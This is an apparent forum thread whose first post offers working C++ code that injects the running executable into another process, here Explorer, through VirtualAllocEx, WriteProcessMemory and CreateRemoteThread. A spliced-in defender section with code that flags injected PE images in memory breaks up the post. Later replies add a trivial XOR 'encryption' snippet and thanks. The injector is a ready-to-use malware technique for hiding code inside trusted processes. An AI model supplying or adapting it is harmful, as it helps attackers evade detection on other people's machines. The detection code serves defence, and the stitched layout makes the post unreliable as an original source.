  1. #1
    Dwar

    [C++] Process Injection

    Process Injection
    This project allows you to copy the local process into another remote process and execute it. There are no requirements for your program for this to work. All you do is call the function and sit back, and the program will run inside the remote address space just as if it was in its own. You do not need to pass memory addresses to the thread because the injected program is set at its own original address in memory, so all variables and functions defined will still work.
    But this will not work on all running processes, because the ImageBase required by the injector executable may already be allocated by the process, causing VirtualAllocEx to fail. To make this work on all processes, you would first have to rebase the injector in memory, then inject it.
    The default ImageBase for an executable is, most of the time, 0x400000, which is available in Explorer.exe, so this process was chosen as the example.

    inject.h
     /* Injection Prototypes */
    #include <windows.h>

    BOOL InjectExecutable(DWORD dwPid, LPTHREAD_START_ROUTINE lpStartProc, LPVOID lpParam);


    inject.h
     #include "inject.h"

    BOOL InjectExecutable(DWORD dwPid, LPTHREAD_START_ROUTINE lpStartProc, LPVOID lpParam)
    {
        HMODULE hModule, hNewModule;
        DWORD dwSize;
        HANDLE hProcess;

        IMAGE_DOS_HEADER ImageDosHeader;
        IMAGE_OPTIONAL_HEADER32 ImageOptionalHeader;

        hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);

        if (hProcess == NULL)
        {
            return FALSE;
        }

        hModule = GetModuleHandle(NULL);

        CopyMemory(&ImageDosHeader, hModule, sizeof(ImageDosHeader));

        CopyMemory(&ImageOptionalHeader, ((BYTE *)hModule + sizeof(DWORD) + ImageDosHeader.e_lfanew + sizeof(IMAGE_FILE_HEADER)), sizeof(ImageOptionalHeader));

        dwSize = ImageOptionalHeader.SizeOfImage;

        hNewModule = VirtualAllocEx(hProcess, hModule, dwSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

        if (hNewModule == NULL)
        {
            return FALSE;
        }

        WriteProcessMemory(hProcess, hNewModule, hModule, dwSize, NULL);

        CreateRemoteThread(hProcess, 0, 0, lpStartProc, lpParam, 0, NULL);

        return TRUE;
    }


    example.c
     #include "inject.h"

    DWORD WINAPI RemFunc(LPVOID lpParam);

    void WinMainCRTStartup()
    {
        DWORD dwPid;

        GetWindowThreadProcessId(FindWindow("ProgMan", NULL), &dwPid);

        InjectExecutable(dwPid, &RemFunc, NULL);
    }

    DWORD WINAPI RemFunc(LPVOID lpParam)
    {
        MessageBox(HWND_DESKTOP, "Greetings from the Hijacked Process!!!!\nDone with ProcessInjection\n.::ANUBIS::.", "Explorer", MB_OK);
        ExitThread(0);
        return 0;
    }

    Author: ANUBIS


    Please, post your questions on forum, not by PM or mail

    I spend my time, so please pay a little bit of your time to keep world in equilibrium
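
For defenders, the injection in post #1 leaves a recognizable artifact in the target: a committed, private (not loader-mapped) PAGE_EXECUTE_READWRITE region that begins with a PE header. The following is an added example, not part of the original post or the author's project, showing that triage check over a memory-region snapshot; `struct region`, `classify` and the sample values are hypothetical and constructed for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <stddef.h>

/* Numeric values match the Windows SDK constants of the same names. */
#define MEM_COMMIT             0x00001000u
#define MEM_PRIVATE            0x00020000u
#define MEM_IMAGE              0x01000000u
#define PAGE_READONLY          0x02u
#define PAGE_READWRITE         0x04u
#define PAGE_EXECUTE_READWRITE 0x40u

/* Hypothetical snapshot record: the MEMORY_BASIC_INFORMATION fields a scanner
   would get from VirtualQueryEx, plus the first two bytes of the region. */
struct region {
    uint32_t base, size, state, protect, type;
    uint8_t  head[2];
};

enum verdict { CLEAN = 0, RWX_PRIVATE = 1, RWX_PRIVATE_PE = 2 };

/* Loader-mapped modules are MEM_IMAGE. A committed MEM_PRIVATE region that is
   writable and executable is unusual; one that begins with "MZ" is a PE image
   copied in by hand, which is what the VirtualAllocEx + WriteProcessMemory
   pair in the post leaves behind. */
enum verdict classify(const struct region *r)
{
    if (!(r->state & MEM_COMMIT) || r->type != MEM_PRIVATE)
        return CLEAN;
    if ((r->protect & 0xffu) != PAGE_EXECUTE_READWRITE)  /* drop PAGE_GUARD etc. */
        return CLEAN;
    return (r->head[0] == 'M' && r->head[1] == 'Z') ? RWX_PRIVATE_PE : RWX_PRIVATE;
}

/* Constructed sample of one process's address space. */
static const struct region sample[] = {
    { 0x00400000, 0x6000,  MEM_COMMIT, PAGE_EXECUTE_READWRITE, MEM_PRIVATE, {'M', 'Z'} },
    { 0x01000000, 0x1000,  MEM_COMMIT, PAGE_READONLY,          MEM_IMAGE,   {'M', 'Z'} },
    { 0x001a0000, 0x10000, MEM_COMMIT, PAGE_READWRITE,         MEM_PRIVATE, {0, 0} },
    { 0x02b00000, 0x1000,  MEM_COMMIT, PAGE_EXECUTE_READWRITE, MEM_PRIVATE, {0x55, 0x8b} },
};

int main(void)
{
    for (size_t i = 0; i < sizeof sample / sizeof sample[0]; i++)
        printf("%08x size=%#x verdict=%d\n", (unsigned)sample[i].base,
               (unsigned)sample[i].size, (int)classify(&sample[i]));
    return 0;
}
```

RWX_PRIVATE on its own also matches JIT compilers, so it is a lead to review rather than a verdict; RWX_PRIVATE_PE is the stronger signal.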

  2. #2
    11moon11

    Post XOR Crypt! C++

    A function which makes your text crypted:
    Code:
    //---------------------------------------------------------------------------
    AnsiString XOR_Crypt(AnsiString in, AnsiString pass)
    {
            AnsiString out;
            for (int x=1;x<in.Length()+1;x++)
            {
                    out += (char)(in[x] ^ pass[x%pass.Length()+1]);
            }
            return out;
    }
    And how to crypt your text:
    Code:
    ShowMessage(XOR_Crypt("pass", "text"));
    PROFIT!

  3. #3
    Viloresi

    Thanks

    This is the most common injection, and from what I can see this doesn't use kernel functions... so thank you very much for sharing.
